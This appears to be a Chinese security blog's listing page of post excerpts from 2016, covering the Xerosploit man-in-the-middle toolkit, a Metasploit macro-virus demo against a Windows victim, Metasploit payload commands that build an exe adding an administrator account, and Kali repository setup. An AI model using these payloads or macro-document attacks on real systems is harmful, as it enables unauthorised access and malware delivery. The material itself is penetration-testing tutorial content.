2016年11月

文章首发于FreeBuf0×00 前言偶然间,在国外网站的一篇文章中发现有提到这款中间人框架,顺藤摸瓜拿来实践一番,发现确实很可以,确实很方便,不敢独享,特来抛砖引玉,不足之处还望斧正~0×01 工具介绍Xerosploit是一款可以进行中间人攻击的渗透测试工具包。它具有多种模块,可以进行多重有效的攻击,如拒绝服务和端口扫描、劫持等。由bettercap和nmap强力驱动。
渗透测试 kali xerosploit 原创 中间人
摘要:利用metasploit生成宏病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:受害机:win10(192.168.8.123) 攻击机:kali(192.168.8.131) 攻击演示:
渗透测试 metasploit 攻击 演示 病毒
分享几个有趣的Metasploit Payloads1. 添加管理员用户use windows/adduserset user building set pass [email protected] set wmic true //是否提升到管理员权限 show options generate -t exe -f /root/adduser.exe //输出exe文件
渗透测试 技巧 metasploit
nano /etc/apt/sources.list添加好kali最新的源此时还需要添加kali的公钥才能apt-get update & apt-get upgrade按照网上几年前的文章方法导入公钥下载gpg --keyserver subkeys.pgp.net --recv-key 44C6513A8E4FB3D30875F758ED444FF07D8D0BF6导入gpg -...
技巧分享 技巧 kali sqlmap debian